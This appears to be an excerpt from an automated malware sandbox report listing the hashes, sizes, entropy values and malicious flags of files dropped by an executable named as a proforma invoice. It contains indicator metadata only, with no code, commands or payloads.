                                                          SSDEEP:24:a7cO8nBhz6c+Oi8A6NNJWm6ls+ARqn/nlCPavz8nPFL6P8j/Qi:TBh71Ak38IRqvPz2PFuPGJ
                                                          MD5:E7112335E77422948BCC9368881622B6
                                                          SHA1:655BA1F63612E543FD27208F4BD7C638659C24B4
                                                          SHA-256:72FAF407EEA25E5097ACEB8904973F152F89DDE6438BAF7D9FD3E57C0B9E3BDC
                                                          SHA-512:7A937060DEF53F3E397BB0337DC53BE2A201BAA0190D618B84D27EF927BD484444C17A021387013558443C65C90A77B2D6A14274E60E61C60CA5BBA2003272E7
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.821409540539878
                                                          Encrypted:false
                                                          SSDEEP:24:TbyNh4ZVuFHONr1NjnhGBIKRolzqWSNk8QHTiIefsuBaDaq:PyNh4ZY1OP5hcoNBQXVIek/aq
                                                          MD5:C8B64E139DE03A2F68E7CBEF327279C4
                                                          SHA1:BFAD5B95802DB42536666DBA76147C1D612B1411
                                                          SHA-256:4935244D1EECC22D38DB289DCF7178A4E1A742BE06670D04965A1B86A7F3EC15
                                                          SHA-512:5B9E8253FA7C976A03370B332243D150B8B94AEA9A261FAC0482420BFE20E7BFF2E16A2DC66587F9F417FD1681F2E881CEF962A1AAA5DB6C3D2C63DF39AFE631
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.819869068167296
                                                          Encrypted:false
                                                          SSDEEP:24:cTdUc4cSRMZYqg2L286JXSTwrzsD3wttRNHlXVkNd:cTdU/b2L286jMktPNHlXVkj
                                                          MD5:8E79C756E83271D1035B5B44D69DBC15
                                                          SHA1:F92BE20EFC2DB0D62F83C8AB9A96B285B5EC5A59
                                                          SHA-256:D9CFC761CC944FC19F5DB50B12A968338A07EA0F1248AA2C0DEFCAFBA82EA6FF
                                                          SHA-512:26C3E3E7F7285EA61DDF51D5BFBB7D36098980CD9FB7CA91BBF60AC1B580A3B914E7E7B9A739D9AD4B3C2E80B654DA48DD23E4FE22F0C2D38D4281D40BDAC5A8
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.79742894563415
                                                          Encrypted:false
                                                          SSDEEP:24:D7/raSfcNXaW7KKC+7XLzxMcGTRDgvtdpNuE0gyP:D7jR+XanKbzx8RDgFvT/c
                                                          MD5:E9975251F6A35CFA326D586A3ABC8723
                                                          SHA1:4FD84337EE6B15DD48F6B8ECEDB4F3E906BA6DC8
                                                          SHA-256:8B4DEB46C659E5DD2485A2A2A65810FB72FDB303677AD9980D560609700BF274
                                                          SHA-512:470162D1E875F45F99A1A0BABEA28B6211ED47488C54693E6E7D5A8A4B0A092ECC66159ADAD731037A00B1BDC00F453E481DA735601CCC5F18CC2C7D7E30936B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.828129222117002
                                                          Encrypted:false
                                                          SSDEEP:24:PaTqBUY+nmh4MALM0MWLRodNqNWM4ywdNU4yyzRVvUbapkqN:SgFh4MAVp+ncWMxcNfysXN
                                                          MD5:054E23C1349999421768276E230B1AA1
                                                          SHA1:A21C992FA3B04B6A3F864B1FCB10B875D2C216F6
                                                          SHA-256:0FCC4BC9102175D067051D2F2A8837FB29F3BF4D79C828D46D9BA1D067C83756
                                                          SHA-512:4E602E6A37CF40DB2B5D1FE408B6FA46020E528B8088388F8ECC540C35614426C8715A14D5060AAD8868945409BD25EB7F29EC93470DC99155EC22C437C229BB
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.800170893089835
                                                          Encrypted:false
                                                          SSDEEP:24:81Q8sVkZB5Vz5pCHarB1HfwkOnARJYAacvcebw3y4:4865VzrCKokOn/AacU+gy4
                                                          MD5:2C3442A044ED4AA75DC7924D86A37B75
                                                          SHA1:2A6BBF1213535BED1A8E986472BA262B571C7363
                                                          SHA-256:084D86FFB46B1E141D373F3BFF0892AA8A748E6E4A8EA05A513075B7D17DE86A
                                                          SHA-512:2D1024D0D5EA482764F30B9F52D3A570A455FA3C2D779FD0A1F84DF18EE3F193742302919E539C3F3D39E3F0FE6D1A6B35CBA43D47716D24E7DC5ABD98885646
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.804696797628274
                                                          Encrypted:false
                                                          SSDEEP:24:a0YYmCyOPbpclRtwpONVYmc9HMJfzqytSuMKOQB6CRl/yDXKTUGdk:OYV3PbClRtCiVcBMRzqykuMKOUR5yqUJ
                                                          MD5:DE6900311FB992C4DEE5502D3AAB75D1
                                                          SHA1:281EA8D8703692EF9683DD4635C2EB3062BBD2B7
                                                          SHA-256:D4F11203FC611B85A2118329F82E27C290A9B6348AC32D42845F195EA339BF42
                                                          SHA-512:3C661B75F6659124B8C5E6E9EFDFB1DA8DABD89B5D5E43C27CC7B9B47C1194AAC57790A7A17A77012548D0F701C8DD7696AE94D7D00FF30B5DB7090BE403D05F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.799256142770332
                                                          Encrypted:false
                                                          SSDEEP:24:0kWuY2ybj8Y3DOmGr1hUWQc6z80pFy5JAJ/B04dgcxbGNX:7Wd2ybgY39Gr1hVQc6z80rH5LmXX
                                                          MD5:D60D2F2C620165F621033B8BC6971117
                                                          SHA1:C60EF1D039A4CE047D1B1F9F6FC664B32C24E6EA
                                                          SHA-256:AE71F895DA3E7E44779B9EB73F5A7F204DDF6578D91D7032817E059EE581DACF
                                                          SHA-512:AFDB580D4B694EE6E5C60A2B623860F40BEA2F6FFDFBCE6D54F666A9A3BB702A1882DF434AB85280653EDE0943D3F4BDCB32FF554D38003314E0ABCA88E2DB70
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.81091196419637
                                                          Encrypted:false
                                                          SSDEEP:24:Uwpprt1zcjKaUJm2DC1FjrC2STS/fbPMPSQcwl5nP1tqQ:LnXzcjKZJCjrkW/Thcl5nOQ
                                                          MD5:7CAD906B0D5397918D3AB4D24830FD1D
                                                          SHA1:6C424B4D3DC3034ABA5D009DCD7684560878268A
                                                          SHA-256:F018225FE533F712CECBE76AC1ACBC7700E9EFECF70E51A468B633B00B2DA030
                                                          SHA-512:4A53E3B1E043430BD567D00980F9A6E9B59B0C6F8D5DA3357A4132971D376767660CD6D9803634F1C9E1900AFA3BABFFCF03D13C7F8C6E865D4580C8122315B6
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):3481559
                                                          Entropy (8bit):7.999312423782288
                                                          Encrypted:true
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.791694000979164
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):3482858
                                                          Entropy (8bit):7.99937050113591
                                                          Encrypted:true
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.795629897227125
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.800194796026652
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:OpenPGP Secret Key
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.818747812713695
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.832827341428288
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.826689884175093
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.80013066252563
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:BS image, Version 31555, Quantization 22622, (Decompresses to 16009 words)
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.8164765808707966
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.813555557528846
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.826740455017789
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.776661021195404
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.796433958163932
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.810758549870751
                                                          Encrypted:false
                                                          SSDEEP:24:9d90c6w7EJRBjg1hPnCXFghSRhIL36doDeJg5cTQ7w5eIFhyyti:9d9v6zX+HCSh2SLqdeeJ7AIFzi
                                                          MD5:A8FB0D9DA12BC0ED3069A43F9523A76E
                                                          SHA1:64F12CB25542A4185A09A3CC01FBE01333A288F5
                                                          SHA-256:B3ACE87709EF359B262C7C91E4466D7C970651D348DEB75A25F28C386B7CB2B8
                                                          SHA-512:90722DAA590FAEFAE52FCFA3A02DC7F757B890EB90DF68937A86FB122ED50A5298E0F863ABF6B0612563A586ED3F85DD3B108E3D058451BAE98600842F310988
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.81348050833733
                                                          Encrypted:false
                                                          SSDEEP:24:IZmmNtOsTXd6dcYWI+l8FdUhzGxgiciItOW5LGQkNl6pMSVqG8dcKr/ZZmPXjA3L:IZtXXdycYY2whCxht8OsqzNXSVqGNwZp
                                                          MD5:D0ED687EBF08BA1A0EA29BAB2BFCE09C
                                                          SHA1:FF4D4CC06F96BA11D63E4F35F315E6D277FB4D8E
                                                          SHA-256:C78B3B0B08E8D5D604B5885BDA88D7BA8FE7ADD8CE3E7F26EBF7FCFBCC791023
                                                          SHA-512:3E6A94EE9844445A8B05F4898213ABA6C834ECB61831B478D5409900A2B34157ACAE51B6724895B837173B59974077B30104858B5A48C0BAC6C2B211C725E411
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.812570552682323
                                                          Encrypted:false
                                                          SSDEEP:24:/z0FvCmTWgFZMqkIqkKwNHLd+Cx7UzBk62ThXueoePGnOJzn:/Iw6cqk6KwVdXA9kPTYeFPG6z
                                                          MD5:7D3B85F2F7A55D2CFD430DF3531406F9
                                                          SHA1:B001604DCCD7FA6E7326C9AC82974FEDD09A7A11
                                                          SHA-256:2FC0FB7D1E1DAF799884C1D98AF119A5C0B24D824EB9B144A5055C35A327DE13
                                                          SHA-512:6A465B3AFC6E9F21108A269FF5095FEA74C878AE8F98AF3458A5F65C78725B53283EF83B6C6C723B48994806FF56CD9765B77807FB6FE93659DD1579032EB6FE
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.817591288804739
                                                          Encrypted:false
                                                          SSDEEP:24:Twq+0Y2iH+z/mp/pq8dAn/7WCe9lfezot36OuU+PqNA6NZ:Twq+Dr1pBqhDWCe9lfefNU+GX
                                                          MD5:13938768AABA77E4EA2EBA42E056555A
                                                          SHA1:97E63D613F2E5062629D8D2DFD7B9DF51C77D34C
                                                          SHA-256:B21062272ECB251542B342EC0E1460C21F3EDBEA3B8819DDE5A0DB234BB6CAFE
                                                          SHA-512:29FFDDB821ADB7DFA5D2EDBBDD0AB6C308A580807994D14B7C0A93ADA3C58EA8FB4E0D8CAA9C08594867BB5102C5952508D815EECD093927A5883713377508FE
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.812807498961308
                                                          Encrypted:false
                                                          SSDEEP:24:iw32IUQJeL0Uy9xNPoH84bwavN+EwSfMaG8:iQ2Iq0Uy9xhcDbw6RjfMaG8
                                                          MD5:210167F483BBD3BFA15FA6AD84AA3769
                                                          SHA1:E27FDA35002F597F03C7F30DF0A0EEFD130E8EFD
                                                          SHA-256:848593B73A0D7F3105A7624F98EB1B6F77AC7D8B3608667028C9E55DCF4EA94C
                                                          SHA-512:DC799BF43EBFDA81D023425A7A862D3A99D44BF9D0F29D4EAF5B597E739D3FAA6890C58062A191A9D0746203574AD0391E312FC344554E54C4A4827F8E8ECCCB
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.79774463592345
                                                          Encrypted:false
                                                          SSDEEP:24:soKX9TyCtuHGuqdwlPmlv3fovmDAaykc0crC/k78VO5:sX9ptumElPsv3fo+DHbcrC/CG4
                                                          MD5:9FBCF1C52751A4AD88F188E99BE02E73
                                                          SHA1:1A8393556D7C6B21C8852C4515B987FB4ED5ED42
                                                          SHA-256:4EFA7AF968DFC95E022EED232E158965A5412266069B6FD3D63121C8EF136CF8
                                                          SHA-512:6742B364F6903DF8AD8887528F854E88520F4AFFBC1BF4816DA8B4369AF4EA7ECEDC550FF5E36F76242F67010FCC805DA0A3FEDA4363C64D1DEF61F7A9C738AE
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.7842309560531975
                                                          Encrypted:false
                                                          SSDEEP:24:ndHzTg1FkuH201oYNdw7SJvX2cx2/BV36O7NHIb2gAIMi:n5inVkk2pV39ZHMBj
                                                          MD5:95BA734036D042FF4959AA2EA0F28DF2
                                                          SHA1:581AFECFA672896C8A09EB82E079D6DBAA2CE94C
                                                          SHA-256:CC21DEE97C14CC783844A307040327C3E8A3CA3B37E208BDDE31FD940F16F207
                                                          SHA-512:B48FA94BBC999C36D2E918D0320507C4719F9E070E11175BD53BB0061823B4CD3B331A338FCB7F377C25440AFA1FF1A7EADED583B630FD6E661A5F7770BDB9F2
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.782252994580477
                                                          Encrypted:false
                                                          SSDEEP:24:Qf26G7obyAr2qPiBGLWN/PMytcrWDS9asbh7fEi:BUyAKqPiFWRrWbACi
                                                          MD5:32BCBD5C41C7B80F3C9CB2316F848ABB
                                                          SHA1:25B4E70583A98EF40F0C9CD68AE9250F5DFF229A
                                                          SHA-256:B69412CDD54229ED9E09471BA62DD506F2C7B9F5C7D64D6BD9C91540234D94AD
                                                          SHA-512:46DAC914E59BE4F5DA639737B7CFE7663E30CABAE54C323D64B20C128D03A3F1806C94B812C480A67A39803EED001E054F66FF3610A3419B26B4D349813E6F13
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.81852808756566
                                                          Encrypted:false
                                                          SSDEEP:24:HMlnB6eczFAOOLFmOa0FVtQAKh3GCj0l88e2efmfVBa:A3cvO5xoACGCj0lNUfQC
                                                          MD5:84F7A2B880AE174CC4551756013B3B54
                                                          SHA1:F9D9E1DBB0EC1407F8310522B488261548253E45
                                                          SHA-256:2F8F4D197948FE948FF9789EE130F8D6147F6167C0F49C0854D3BC36128F341A
                                                          SHA-512:94514F78CA07E2673BDBD287CB8F801E4DEC34D302E2A5FD57E157F14BF08A78BAD38A971E7E0DE64CE5C9A77BBF54D9AA881D109E0910F8B910FA1155E56BAC
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.812830001482073
                                                          Encrypted:false
                                                          SSDEEP:24:lzNCEvn3naaqtZBX1C9yle4DBxE3UEjXJ0SghZW:lzNC6n3antZBG8DBxqUYSSMW
                                                          MD5:AA341E3728B2E710AD7F37ACEADC70FB
                                                          SHA1:A4A784F2BCD68568121547A3619E572DD57836BB
                                                          SHA-256:6F80D5CD465495967E3F3D3E8E5A02BE837550902CD214E79F6367DCE0C4895D
                                                          SHA-512:D8A5CBE26ACBF6A74AA54629AE4A037ADEAC279DAC5EB1D308E3E977B7B85638D107AE9774A37836F2EDA1F8FA2F0B67C18A635EF2058031EBA61B8FD19D19BA
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.82126842594817
                                                          Encrypted:false
                                                          SSDEEP:24:ZNkHLExWn9gcKhbdV1XNECwzGphnEWFfeP5yLXTOK7GRTx4:j+EILybj8HQhnA5mhGRW
                                                          MD5:5E2FA6BCCD72E2339910C266102B9D95
                                                          SHA1:A85DFA83764C7D43C361C919DF5A3D61C5232687
                                                          SHA-256:2FD7B3CD2AA0088EA92E23CC05CC254AE0F3E15CD5ADAE8F8B1E13C3F91CD0CA
                                                          SHA-512:38E1F7391114994CDF9A7D7324DF990226601BCB5F3E4F5FEE3B08F5C9F4725B77E9E2ECC538DF35C462687F0AEC8B59521ABDAD0EE6DC875DD8FD162FD0CE8E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.824193176060253
                                                          Encrypted:false
                                                          SSDEEP:24:OahszzHUchuEkke5581nqlBndsOXtSexowtGjgQ9D8LZrOfYZACC6s:/scTEkvQqlBWedcgQ9aOcCJ
                                                          MD5:CE809ED94E41990DABFCA8234D0B5735
                                                          SHA1:60DEACD34E8C524A495E3B0675915BEF958F67A2
                                                          SHA-256:D1C0FC9897B7DE837B47E28F05B8879608CB28B1FBC4E452072C65844375B941
                                                          SHA-512:DE833F95DFFACAEC9302A94907DA86F74288C6E4E40EA97E668A19EF9C221088A7A32F07BA07CB47ABF694E905619291B52B926E51FF9CBFCE555AEB1360B10E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):271360
                                                          Entropy (8bit):7.999251702688857
                                                          Encrypted:true
                                                          SSDEEP:6144:nm+2KG2DxX4i2d5WYgYOK5PTYREt/j+Z9qpvyWYJlG5mmM:nm+BBxuaYhX7OA/jigpvu3G5mmM
                                                          MD5:B103D8F0B3532D62D3C2EC56EFA2C68A
                                                          SHA1:ADD37CA55017F6C48C2DC0075BFFD6E539E2658E
                                                          SHA-256:AABDAEDD41777838A2AFC22434DE19B8EBC46992ABD32987FEB6E28D2DD7DA65
                                                          SHA-512:3FAC126233C5DE65AE0934FEB6053F433CEE9E9BDE0CF6EF98C4F91A9E7184E1DD44368B7104FEFD6408D65F48806777FBD1E226D82F4A38C13A9BB43489900A
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.794803001924923
                                                          Encrypted:false
                                                          SSDEEP:24:Bz4SAImiN7IVEZ6/QqozCs/uCuwutQpYUGueuqYED1UZ7b7n:BW7iFIEo/JYCsdm0pebJmZP7
                                                          MD5:1D13DA032FA361CFB76B5CFF5719FE82
                                                          SHA1:F5F31E4C36928A6C6BDD303114ADED800353D32A
                                                          SHA-256:D545D870A3C5CB77E2CDC2D12CA65A845122E33FC478E97978429F74AC6AF919
                                                          SHA-512:CA5B4CF764DA508031102AEE136D773CEADC25A4F3002F7E8887647CC7543C29A17C14B14285BC8CA73CE36109D345C4D57DD9198D4233803654166FC7EC9B94
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.789710739446829
                                                          Encrypted:false
                                                          SSDEEP:24:53KV8andSWgEM7lLnhrCJoKgbg27f/MPSxPnpfkXrHU:56VXtA7lLnhrCvAuCPn1kXr0
                                                          MD5:C587FFC44075D235F3CF888592089B8F
                                                          SHA1:1714F0AE1B6F8931D62DDF9B4F14429C4622AB2E
                                                          SHA-256:D461AAE5215EB856A7D54A573A14194A0BC18CD8859CC8E1E72140855FCE0571
                                                          SHA-512:FC2126ADBA9C705E33BB0316554264C0E075E9438F81A3DA4872DA710957DECDB69DD5CBBE57C09C1B0300D0C0EF82A1BB46561A3F085FD3731BD05818E6381E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.811154944660018
                                                          Encrypted:false
                                                          SSDEEP:24:+vsunKW+c6jQiFxSePvnbvPY0Fu0VCEkR1bUhj9:1aSBUO3PvbvQ0KN74D
                                                          MD5:538C27E0F6B1001FD601196518FEE4D8
                                                          SHA1:6D5D5F0F81107F3D9918148816496944BED85A50
                                                          SHA-256:0B430FA884CD62DBAC765F89B8784D25BFD82B9C503126A3CF383A23C18991DC
                                                          SHA-512:118C8A9FB63E9DA7CC262C93997339CF622D0A9149C1E5CD82D658E7241773577D31E17644B64CE801AD08924B11606B5D14197F647688EA3272110F51EB438F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.7934136993049234
                                                          Encrypted:false
                                                          SSDEEP:24:Zx18eP+SY6u6RMN9u9jkuAp/6Sxn8o9paG4RYGIOWpyMch:vtmSY6qN9u94uAl6Gn8GaG4RpxKyMch
                                                          MD5:CA84C077B82EA5A847AB245EA15728F7
                                                          SHA1:6B0B9D8B6F34EEE3739FF856A7636C8FDF0213C8
                                                          SHA-256:5563E2FE5F9A991636E46BBA70783A89362480763E0C69EA0EC62337C73877A9
                                                          SHA-512:B6F979148723EFAB947A01970A405F14052C3B24BD19620123E9EDF46EF8527BBC3CF1F4AF35F70EF060CAF8995C9D3A8C0F58791C62D22D88CCCA087D11D66C
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:OpenPGP Secret Key
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.8163487633396285
                                                          Encrypted:false
                                                          SSDEEP:24:sfwySVOetAJ6NIHyV5X4nMp0W1vjZhd7Cqh0RK:sfHSYMvmyV59p0WFZ/MK
                                                          MD5:D0242B3519D7DEBF6D774431BE4B6554
                                                          SHA1:EA80BA05A7EC017AFE5C2DD8947C36250D7373E0
                                                          SHA-256:10374A847DEC3BE5C5F190629FE552F8AD647F602AAA081E5D91FC182631BDE4
                                                          SHA-512:3587F6CAE516C5558D70E2D3D0975131B052446E2DA42E128E9CF242DF2649321621BF7E6FBB077F76AC5E78D91CC3035955F3AC2423EE52BF854081359F8FF5
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.7993485033063426
                                                          Encrypted:false
                                                          SSDEEP:24:iuOt/cNfdPcecHrIK5b6XFh0dVPVVNYyY/OUDkU:fM/cN1UecLIqb6XFWHP+yY/OUQU
                                                          MD5:608203364342812ED5FAED87A7F3B3C8
                                                          SHA1:EC2CDC4FEE3895B88E46E1B87EE0712FBF7604E6
                                                          SHA-256:5BAD441A5E3AE85FD3435CC095CD40C55D856BFB0FF7A572151F0BC3F200592A
                                                          SHA-512:068BBF9C2287550954C49F46222DB307FEC2912F3F1B61C3836D8EC1953CD7E62B7885C262D48BF398E48413C7198C8C1D0C504155F2AB26FA88EBEAFAD83D36
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.817610163643991
                                                          Encrypted:false
                                                          SSDEEP:24:ScFgx3uPkuakUndwpAzK9GqlSkKx0o/NUDI94sezvf:3FIe8pdJu9VWNkIvg3
                                                          MD5:F5F81660FE1310BD8C724E6E20EBF545
                                                          SHA1:8B01AFD147AA7C1F63C8777FAC0EC5E2541EDD3F
                                                          SHA-256:3794B37F75980A2B3D98221F96822604EACBC6054DEF7D407F0C155EB234B455
                                                          SHA-512:C6F7D2BE60D4FE8BEB93B50F75AC4485A337CB6F4E01619318D2376AB36EFEDB532E26180ECC77FD29D991C9DAC20EAD4DC44D009CFD4D2FEE446DB5C8C0B5E6
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.823621733972832
                                                          Encrypted:false
                                                          SSDEEP:24:ePo4IvUVkN55OzXPS2IoB1KhXc+JUIz8YHLTHzGxCFTzYtkSmci:eQdsECzlIoyLUIz8YfHycFfCC
